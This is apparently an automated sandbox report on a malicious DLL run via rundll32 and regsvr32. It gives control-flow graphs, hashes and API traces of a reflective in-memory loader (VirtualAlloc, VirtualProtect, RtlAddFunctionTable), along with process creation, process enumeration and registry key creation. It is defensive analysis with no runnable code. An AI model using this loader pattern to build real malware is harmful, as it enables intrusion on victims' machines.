                                                                                                        execution_graph 3078 180016464 3081 1800164a2 3078->3081 3080 180016b9d 3081->3080 3082 18000741c 3081->3082 3083 18000745d 3082->3083 3084 1800284b0 CreateProcessW 3083->3084 3085 1800075fe 3084->3085 3085->3080 3055 181048c0000 3059 181048c015a 3055->3059 3056 181048c08eb 3057 181048c033f GetNativeSystemInfo 3057->3056 3058 181048c0377 VirtualAlloc 3057->3058 3063 181048c0395 3058->3063 3059->3056 3059->3057 3060 181048c0873 3060->3056 3061 181048c08c6 RtlAddFunctionTable 3060->3061 3061->3056 3062 181048c084b VirtualProtect 3062->3063 3063->3060 3063->3062 3064 18000be34 3067 180005db4 3064->3067 3066 18000bf4c 3068 180005df9 3067->3068 3069 1800060dd Process32FirstW 3068->3069 3070 180005e61 3068->3070 3069->3068 3070->3066 3097 180015b18 3100 180015b4c 3097->3100 3098 18000741c CreateProcessW 3098->3100 3099 1800160d6 3100->3098 3100->3099 3086 1800096b8 3087 1800096f2 3086->3087 3089 18000971e 3087->3089 3090 18000be34 3087->3090 3091 180005db4 Process32FirstW 3090->3091 3092 18000bf4c 3091->3092 3092->3087 3101 18001d32c 3102 18001d36d 3101->3102 3103 18001d706 3102->3103 3104 18000be34 Process32FirstW 3102->3104 3104->3102 3071 18000741c 3072 18000745d 3071->3072 3075 1800284b0 3072->3075 3074 1800075fe 3077 180028554 3075->3077 3076 180028653 CreateProcessW 3076->3074 3077->3076 3109 18000f3e0 3112 18000f41e 3109->3112 3110 18000741c CreateProcessW 3111 18000fdb1 3110->3111 3112->3110 3112->3111

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 181048c0000-181048c029a call 181048c091c * 2 13 181048c02a0-181048c02a4 0->13 14 181048c0905 0->14 13->14 15 181048c02aa-181048c02ae 13->15 16 181048c0907-181048c091a 14->16 15->14 17 181048c02b4-181048c02b8 15->17 17->14 18 181048c02be-181048c02c5 17->18 18->14 19 181048c02cb-181048c02dc 18->19 19->14 20 181048c02e2-181048c02eb 19->20 20->14 21 181048c02f1-181048c02fc 20->21 21->14 22 181048c0302-181048c0312 21->22 23 181048c033f-181048c0371 GetNativeSystemInfo 22->23 24 181048c0314-181048c031a 22->24 23->14 25 181048c0377-181048c0393 VirtualAlloc 23->25 26 181048c031c-181048c0324 24->26 29 181048c03aa-181048c03ae 25->29 30 181048c0395-181048c03a8 25->30 27 181048c032c-181048c032d 26->27 28 181048c0326-181048c032a 26->28 31 181048c032f-181048c033d 27->31 28->31 32 181048c03b0-181048c03c2 29->32 33 181048c03dc-181048c03e3 29->33 30->29 31->23 31->26 35 181048c03d4-181048c03d8 32->35 36 181048c03fb-181048c0417 33->36 37 181048c03e5-181048c03f9 33->37 40 181048c03da 35->40 41 181048c03c4-181048c03d1 35->41 38 181048c0419-181048c041a 36->38 39 181048c0458-181048c0465 36->39 37->36 37->37 42 181048c041c-181048c0422 38->42 43 181048c046b-181048c0472 39->43 44 181048c0537-181048c0542 39->44 40->36 41->35 45 181048c0448-181048c0456 42->45 46 181048c0424-181048c0446 42->46 43->44 49 181048c0478-181048c0485 43->49 47 181048c06e6-181048c06ed 44->47 48 181048c0548-181048c0559 44->48 45->39 45->42 46->45 46->46 52 181048c07ac-181048c07c3 47->52 53 181048c06f3-181048c0707 47->53 50 181048c0562-181048c0565 48->50 49->44 51 181048c048b-181048c048f 49->51 54 181048c055b-181048c055f 50->54 55 181048c0567-181048c0574 50->55 56 181048c051b-181048c0525 51->56 59 181048c07c9-181048c07cd 52->59 60 181048c087a-181048c088d 52->60 57 181048c070d 53->57 58 181048c07a9-181048c07aa 53->58 54->50 63 181048c060d-181048c0619 55->63 64 181048c057a-181048c057d 55->64 61 181048c052b-181048c0531 56->61 62 181048c0494-181048c04a8 56->62 65 181048c0712-181048c0736 57->65 58->52 66 181048c07d0-181048c07d3 59->66 82 181048c088f-181048c089a 60->82 83 181048c08b3-181048c08ba 60->83 61->44 61->51 67 181048c04cf-181048c04d3 62->67 68 181048c04aa-181048c04cd 62->68 73 181048c061f 63->73 74 181048c06e2-181048c06e3 63->74 64->63 69 181048c0583-181048c059b 64->69 94 181048c0796-181048c079f 65->94 95 181048c0738-181048c073e 65->95 71 181048c085f-181048c086d 66->71 72 181048c07d9-181048c07e9 66->72 78 181048c04d5-181048c04e1 67->78 79 181048c04e3-181048c04e7 67->79 77 181048c0518-181048c0519 68->77 69->63 80 181048c059d-181048c059e 69->80 71->66 76 181048c0873-181048c0874 71->76 84 181048c080d-181048c080f 72->84 85 181048c07eb-181048c07ed 72->85 75 181048c0625-181048c0648 73->75 74->47 110 181048c064a-181048c064b 75->110 111 181048c06b2-181048c06b7 75->111 76->60 77->56 90 181048c0511-181048c0515 78->90 92 181048c04fe-181048c0502 79->92 93 181048c04e9-181048c04fc 79->93 91 181048c05a0-181048c0605 80->91 96 181048c08ab-181048c08b1 82->96 86 181048c08eb-181048c0903 83->86 87 181048c08bc-181048c08c4 83->87 88 181048c0811-181048c0820 84->88 89 181048c0822-181048c082b 84->89 97 181048c07ef-181048c07f9 85->97 98 181048c07fb-181048c080b 85->98 86->16 87->86 105 181048c08c6-181048c08e9 RtlAddFunctionTable 87->105 99 181048c082e-181048c083d 88->99 89->99 90->77 91->91 100 181048c0607 91->100 92->77 107 181048c0504-181048c050e 92->107 93->90 94->65 106 181048c07a5-181048c07a6 94->106 101 181048c0740-181048c0746 95->101 102 181048c0748-181048c0754 95->102 96->83 103 181048c089c-181048c08a8 96->103 97->99 98->99 112 181048c083f-181048c0845 99->112 113 181048c084b-181048c085c VirtualProtect 99->113 100->63 115 181048c077b-181048c078d 101->115 108 181048c0756-181048c0757 102->108 109 181048c0764-181048c0776 102->109 103->96 105->86 106->58 107->90 119 181048c0759-181048c0762 108->119 109->115 120 181048c064e-181048c0651 110->120 116 181048c06ce-181048c06d8 111->116 117 181048c06b9-181048c06bd 111->117 112->113 113->71 115->94 128 181048c078f-181048c0794 115->128 116->75 122 181048c06de-181048c06df 116->122 117->116 121 181048c06bf-181048c06c3 117->121 119->109 119->119 123 181048c065b-181048c0666 120->123 124 181048c0653-181048c0659 120->124 121->116 126 181048c06c5 121->126 122->74 129 181048c0676-181048c0688 123->129 130 181048c0668-181048c0669 123->130 127 181048c068d-181048c06a3 124->127 126->116 133 181048c06ac 127->133 134 181048c06a5-181048c06aa 127->134 128->95 129->127 131 181048c066b-181048c0674 130->131 131->129 131->131 133->111 134->120
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.262100096.00000181048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000181048C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_181048c0000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: c670b60b97f8062337647ece829e02f7b4b271ad35d34cd409c1eb1c7083cd93
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: E462D231658B089BD719DF98DCC57A9B3E4FB45308F10861EE48AD7251DF34E582CB8A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 385 1800284b0-18002857e call 180011408 388 180028653-18002868d CreateProcessW 385->388 389 180028584-18002864d call 18000f174 385->389 389->388
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.260138697.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:12.4%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:46
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 3078 180016464 3081 1800164a2 3078->3081 3080 180016b9d 3081->3080 3082 18000741c 3081->3082 3083 18000745d 3082->3083 3084 1800284b0 CreateProcessW 3083->3084 3085 1800075fe 3084->3085 3085->3080 3055 18000be34 3058 180005db4 3055->3058 3057 18000bf4c 3059 180005df9 3058->3059 3060 1800060dd Process32FirstW 3059->3060 3061 180005e61 3059->3061 3060->3059 3061->3057 3062 222d2e80000 3065 222d2e8015a 3062->3065 3063 222d2e8033f GetNativeSystemInfo 3064 222d2e80377 VirtualAlloc 3063->3064 3070 222d2e808eb 3063->3070 3067 222d2e80395 3064->3067 3065->3063 3065->3070 3066 222d2e80873 3068 222d2e808c6 RtlAddFunctionTable 3066->3068 3066->3070 3067->3066 3069 222d2e8084b VirtualProtect 3067->3069 3068->3070 3069->3067 3097 180015b18 3099 180015b4c 3097->3099 3098 18000741c CreateProcessW 3098->3099 3099->3098 3100 1800160d6 3099->3100 3086 1800096b8 3087 1800096f2 3086->3087 3088 18000971e 3087->3088 3090 18000be34 3087->3090 3091 180005db4 Process32FirstW 3090->3091 3092 18000bf4c 3091->3092 3092->3087 3101 18001d32c 3102 18001d36d 3101->3102 3103 18001d706 3102->3103 3104 18000be34 Process32FirstW 3102->3104 3104->3102 3071 18000741c 3072 18000745d 3071->3072 3075 1800284b0 3072->3075 3074 1800075fe 3077 180028554 3075->3077 3076 180028653 CreateProcessW 3076->3074 3077->3076 3109 18000f3e0 3112 18000f41e 3109->3112 3110 18000741c CreateProcessW 3111 18000fdb1 3110->3111 3112->3110 3112->3111

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 222d2e80000-222d2e8029a call 222d2e8091c * 2 13 222d2e802a0-222d2e802a4 0->13 14 222d2e80905 0->14 13->14 15 222d2e802aa-222d2e802ae 13->15 16 222d2e80907-222d2e8091a 14->16 15->14 17 222d2e802b4-222d2e802b8 15->17 17->14 18 222d2e802be-222d2e802c5 17->18 18->14 19 222d2e802cb-222d2e802dc 18->19 19->14 20 222d2e802e2-222d2e802eb 19->20 20->14 21 222d2e802f1-222d2e802fc 20->21 21->14 22 222d2e80302-222d2e80312 21->22 23 222d2e8033f-222d2e80371 GetNativeSystemInfo 22->23 24 222d2e80314-222d2e8031a 22->24 23->14 26 222d2e80377-222d2e80393 VirtualAlloc 23->26 25 222d2e8031c-222d2e80324 24->25 27 222d2e8032c-222d2e8032d 25->27 28 222d2e80326-222d2e8032a 25->28 29 222d2e803aa-222d2e803ae 26->29 30 222d2e80395-222d2e803a8 26->30 31 222d2e8032f-222d2e8033d 27->31 28->31 32 222d2e803dc-222d2e803e3 29->32 33 222d2e803b0-222d2e803c2 29->33 30->29 31->23 31->25 34 222d2e803fb-222d2e80417 32->34 35 222d2e803e5-222d2e803f9 32->35 37 222d2e803d4-222d2e803d8 33->37 38 222d2e80458-222d2e80465 34->38 39 222d2e80419-222d2e8041a 34->39 35->34 35->35 40 222d2e803da 37->40 41 222d2e803c4-222d2e803d1 37->41 43 222d2e8046b-222d2e80472 38->43 44 222d2e80537-222d2e80542 38->44 42 222d2e8041c-222d2e80422 39->42 40->34 41->37 45 222d2e80424-222d2e80446 42->45 46 222d2e80448-222d2e80456 42->46 43->44 49 222d2e80478-222d2e80485 43->49 47 222d2e806e6-222d2e806ed 44->47 48 222d2e80548-222d2e80559 44->48 45->45 45->46 46->38 46->42 52 222d2e807ac-222d2e807c3 47->52 53 222d2e806f3-222d2e80707 47->53 50 222d2e80562-222d2e80565 48->50 49->44 51 222d2e8048b-222d2e8048f 49->51 54 222d2e8055b-222d2e8055f 50->54 55 222d2e80567-222d2e80574 50->55 56 222d2e8051b-222d2e80525 51->56 59 222d2e8087a-222d2e8088d 52->59 60 222d2e807c9-222d2e807cd 52->60 57 222d2e8070d 53->57 58 222d2e807a9-222d2e807aa 53->58 54->50 63 222d2e8057a-222d2e8057d 55->63 64 222d2e8060d-222d2e80619 55->64 61 222d2e8052b-222d2e80531 56->61 62 222d2e80494-222d2e804a8 56->62 65 222d2e80712-222d2e80736 57->65 58->52 84 222d2e8088f-222d2e8089a 59->84 85 222d2e808b3-222d2e808ba 59->85 66 222d2e807d0-222d2e807d3 60->66 61->44 61->51 69 222d2e804aa-222d2e804cd 62->69 70 222d2e804cf-222d2e804d3 62->70 63->64 71 222d2e80583-222d2e8059b 63->71 67 222d2e8061f 64->67 68 222d2e806e2-222d2e806e3 64->68 96 222d2e80796-222d2e8079f 65->96 97 222d2e80738-222d2e8073e 65->97 73 222d2e8085f-222d2e8086d 66->73 74 222d2e807d9-222d2e807e9 66->74 77 222d2e80625-222d2e80648 67->77 68->47 79 222d2e80518-222d2e80519 69->79 80 222d2e804e3-222d2e804e7 70->80 81 222d2e804d5-222d2e804e1 70->81 71->64 82 222d2e8059d-222d2e8059e 71->82 73->66 78 222d2e80873-222d2e80874 73->78 75 222d2e807eb-222d2e807ed 74->75 76 222d2e8080d-222d2e8080f 74->76 86 222d2e807fb-222d2e8080b 75->86 87 222d2e807ef-222d2e807f9 75->87 88 222d2e80811-222d2e80820 76->88 89 222d2e80822-222d2e8082b 76->89 111 222d2e8064a-222d2e8064b 77->111 112 222d2e806b2-222d2e806b7 77->112 78->59 79->56 94 222d2e804fe-222d2e80502 80->94 95 222d2e804e9-222d2e804fc 80->95 92 222d2e80511-222d2e80515 81->92 93 222d2e805a0-222d2e80605 82->93 98 222d2e808ab-222d2e808b1 84->98 90 222d2e808eb-222d2e80903 85->90 91 222d2e808bc-222d2e808c4 85->91 100 222d2e8082e-222d2e8083d 86->100 87->100 88->100 89->100 90->16 91->90 106 222d2e808c6-222d2e808e9 RtlAddFunctionTable 91->106 92->79 93->93 101 222d2e80607 93->101 94->79 99 222d2e80504-222d2e8050e 94->99 95->92 96->65 107 222d2e807a5-222d2e807a6 96->107 102 222d2e80740-222d2e80746 97->102 103 222d2e80748-222d2e80754 97->103 98->85 104 222d2e8089c-222d2e808a8 98->104 99->92 113 222d2e8084b-222d2e8085c VirtualProtect 100->113 114 222d2e8083f-222d2e80845 100->114 101->64 108 222d2e8077b-222d2e8078d 102->108 109 222d2e80764-222d2e80776 103->109 110 222d2e80756-222d2e80757 103->110 104->98 106->90 107->58 108->96 127 222d2e8078f-222d2e80794 108->127 109->108 119 222d2e80759-222d2e80762 110->119 120 222d2e8064e-222d2e80651 111->120 116 222d2e806ce-222d2e806d8 112->116 117 222d2e806b9-222d2e806bd 112->117 113->73 114->113 116->77 122 222d2e806de-222d2e806df 116->122 117->116 121 222d2e806bf-222d2e806c3 117->121 119->109 119->119 124 222d2e8065b-222d2e80666 120->124 125 222d2e80653-222d2e80659 120->125 121->116 126 222d2e806c5 121->126 122->68 129 222d2e80676-222d2e80688 124->129 130 222d2e80668-222d2e80669 124->130 128 222d2e8068d-222d2e806a3 125->128 126->116 127->97 133 222d2e806ac 128->133 134 222d2e806a5-222d2e806aa 128->134 129->128 131 222d2e8066b-222d2e80674 130->131 131->129 131->131 133->112 134->120
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.262693868.00000222D2E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000222D2E80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_222d2e80000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 32b6d44b3af6a2561e5a08249845bed0ac3ce7d5407e5143050120736f716cc5
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: D062E330618B08EBD769DF68C8897A9B3E0FF94304F14462DD8CAC7252DB75E546CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 385 1800284b0-18002857e call 180011408 388 180028653-18002868d CreateProcessW 385->388 389 180028584-18002864d call 18000f174 385->389 389->388
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.262113824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:17.5%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:51
                                                                                                        Total number of Limit Nodes:5
                                                                                                        execution_graph 3179 180020c24 3180 180020c51 3179->3180 3181 180020cbf 3180->3181 3183 1800257b4 3180->3183 3185 1800257de 3183->3185 3186 180025b12 3185->3186 3187 180009298 3185->3187 3186->3181 3189 18000939e 3187->3189 3188 18000959c 3188->3185 3189->3188 3191 180001874 3189->3191 3193 180001904 3191->3193 3192 1800019de GetVolumeInformationW 3192->3188 3193->3192 3194 18000be34 3197 180005db4 3194->3197 3196 18000bf4c 3198 180005df9 3197->3198 3199 1800060dd Process32FirstW 3198->3199 3200 180005e61 3198->3200 3199->3198 3200->3196 3224 180018778 3227 1800187ab 3224->3227 3225 1800187e7 3226 180013cec RegCreateKeyExW 3226->3227 3227->3225 3227->3226 3228 18001fb88 3231 18001fbb0 3228->3231 3229 18000be34 Process32FirstW 3229->3231 3230 18001fdcf 3231->3229 3231->3230 3232 1800096b8 3233 1800096f2 3232->3233 3234 18000971e 3233->3234 3235 18000be34 Process32FirstW 3233->3235 3235->3233 3201 790000 3204 79015a 3201->3204 3202 79033f GetNativeSystemInfo 3203 790377 VirtualAlloc 3202->3203 3205 7908eb 3202->3205 3209 790395 3203->3209 3204->3202 3204->3205 3206 790873 3206->3205 3207 7908c6 RtlAddFunctionTable 3206->3207 3207->3205 3208 79084b VirtualProtect 3208->3209 3209->3206 3209->3208 3217 18001d32c 3218 18001d36d 3217->3218 3219 18001d706 3218->3219 3221 18000be34 3218->3221 3222 180005db4 Process32FirstW 3221->3222 3223 18000bf4c 3222->3223 3223->3218 3210 180002a7c 3212 180002abc 3210->3212 3211 18000380d 3212->3211 3214 180013cec 3212->3214 3216 180013d99 3214->3216 3215 180013e8f RegCreateKeyExW 3215->3212 3216->3215

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 790000-79029a call 79091c * 2 13 7902a0-7902a4 0->13 14 790905 0->14 13->14 15 7902aa-7902ae 13->15 16 790907-79091a 14->16 15->14 17 7902b4-7902b8 15->17 17->14 18 7902be-7902c5 17->18 18->14 19 7902cb-7902dc 18->19 19->14 20 7902e2-7902eb 19->20 20->14 21 7902f1-7902fc 20->21 21->14 22 790302-790312 21->22 23 79033f-790371 GetNativeSystemInfo 22->23 24 790314-79031a 22->24 23->14 26 790377-790393 VirtualAlloc 23->26 25 79031c-790324 24->25 27 79032c-79032d 25->27 28 790326-79032a 25->28 29 7903aa-7903ae 26->29 30 790395-7903a8 26->30 31 79032f-79033d 27->31 28->31 32 7903dc-7903e3 29->32 33 7903b0-7903c2 29->33 30->29 31->23 31->25 36 7903fb-790417 32->36 37 7903e5-7903f9 32->37 35 7903d4-7903d8 33->35 40 7903da 35->40 41 7903c4-7903d1 35->41 38 790419-79041a 36->38 39 790458-790465 36->39 37->36 37->37 42 79041c-790422 38->42 43 79046b-790472 39->43 44 790537-790542 39->44 40->36 41->35 45 790448-790456 42->45 46 790424-790446 42->46 43->44 49 790478-790485 43->49 47 790548-790559 44->47 48 7906e6-7906ed 44->48 45->39 45->42 46->45 46->46 50 790562-790565 47->50 52 7907ac-7907c3 48->52 53 7906f3-790707 48->53 49->44 51 79048b-79048f 49->51 54 79055b-79055f 50->54 55 790567-790574 50->55 56 79051b-790525 51->56 59 7907c9-7907cd 52->59 60 79087a-79088d 52->60 57 7907a9-7907aa 53->57 58 79070d 53->58 54->50 63 79057a-79057d 55->63 64 79060d-790619 55->64 61 79052b-790531 56->61 62 790494-7904a8 56->62 57->52 65 790712-790736 58->65 66 7907d0-7907d3 59->66 82 79088f-79089a 60->82 83 7908b3-7908ba 60->83 61->44 61->51 69 7904aa-7904cd 62->69 70 7904cf-7904d3 62->70 63->64 71 790583-79059b 63->71 67 79061f 64->67 68 7906e2-7906e3 64->68 96 790738-79073e 65->96 97 790796-79079f 65->97 73 7907d9-7907e9 66->73 74 79085f-79086d 66->74 75 790625-790648 67->75 68->48 77 790518-790519 69->77 78 7904e3-7904e7 70->78 79 7904d5-7904e1 70->79 71->64 80 79059d-79059e 71->80 84 7907eb-7907ed 73->84 85 79080d-79080f 73->85 74->66 76 790873-790874 74->76 111 79064a-79064b 75->111 112 7906b2-7906b7 75->112 76->60 77->56 94 7904e9-7904fc 78->94 95 7904fe-790502 78->95 92 790511-790515 79->92 93 7905a0-790605 80->93 98 7908ab-7908b1 82->98 88 7908eb-790903 83->88 89 7908bc-7908c4 83->89 86 7907fb-79080b 84->86 87 7907ef-7907f9 84->87 90 790811-790820 85->90 91 790822-79082b 85->91 100 79082e-79083d 86->100 87->100 88->16 89->88 106 7908c6-7908e9 RtlAddFunctionTable 89->106 90->100 91->100 92->77 93->93 101 790607 93->101 94->92 95->77 99 790504-79050e 95->99 102 790748-790754 96->102 103 790740-790746 96->103 97->65 107 7907a5-7907a6 97->107 98->83 104 79089c-7908a8 98->104 99->92 113 79084b-79085c VirtualProtect 100->113 114 79083f-790845 100->114 101->64 109 790764-790776 102->109 110 790756-790757 102->110 108 79077b-79078d 103->108 104->98 106->88 107->57 108->97 127 79078f-790794 108->127 109->108 119 790759-790762 110->119 120 79064e-790651 111->120 116 7906b9-7906bd 112->116 117 7906ce-7906d8 112->117 113->74 114->113 116->117 121 7906bf-7906c3 116->121 117->75 122 7906de-7906df 117->122 119->109 119->119 124 79065b-790666 120->124 125 790653-790659 120->125 121->117 126 7906c5 121->126 122->68 129 790668-790669 124->129 130 790676-790688 124->130 128 79068d-7906a3 125->128 126->117 127->96 133 7906ac 128->133 134 7906a5-7906aa 128->134 131 79066b-790674 129->131 130->128 131->130 131->131 133->112 134->120
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE ref: 00790344
                                                                                                        • VirtualAlloc.KERNELBASE ref: 0079038A
                                                                                                        • VirtualProtect.KERNELBASE ref: 0079085C
                                                                                                        • RtlAddFunctionTable.KERNEL32 ref: 007908E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.770367315.0000000000790000.00000040.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_790000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 9359b4e3e5894b46d8b426aa6f315c4a805d71d238b631337119163b798439a0
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: 4152D330628B488FDB19DF18E8856BAB7F1FB54304F14462DE88AC7251DB38E556CBC6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 547 180013cec-180013dc2 call 180011408 550 180013dc8-180013e89 call 18000f174 547->550 551 180013e8f-180013ecc RegCreateKeyExW 547->551 550->551
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID: n$,
                                                                                                        • API String ID: 2289755597-3401186129
                                                                                                        • Opcode ID: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
                                                                                                        • Instruction ID: 2cb52e6b05ba7e48ba693a2826620437475c4cbbd9ed89f570f000b883edcea4
                                                                                                        • Opcode Fuzzy Hash: 387e2cbc3b8f1e88da992bb010cb1f5f0f0347c8b7639cfc6325d4f78df53c71
                                                                                                        • Instruction Fuzzy Hash: C251037051C7848FD7B8DF68D08579AFBE0FB88314F108A2EE88DD3250DB7498858B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.771127294.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationVolume
                                                                                                        • String ID:
                                                                                                        • API String ID: 2039140958-0
                                                                                                        • Opcode ID: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
                                                                                                        • Instruction ID: 43b5742128dda7179e1ece1c22ac01b13fc8f1aebeeb4861cd8a3c6048fefe45
                                                                                                        • Opcode Fuzzy Hash: c26c48defa982342e2f20ae4a22bab2a9dda78d1f7e6cee8cfcae6a4f9b5f28e
                                                                                                        • Instruction Fuzzy Hash: 9A412A7051C7858FE7B4DF28D485B9AB7E0FB88315F10896DE88CC7296DB748888CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:11.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:41
                                                                                                        Total number of Limit Nodes:3
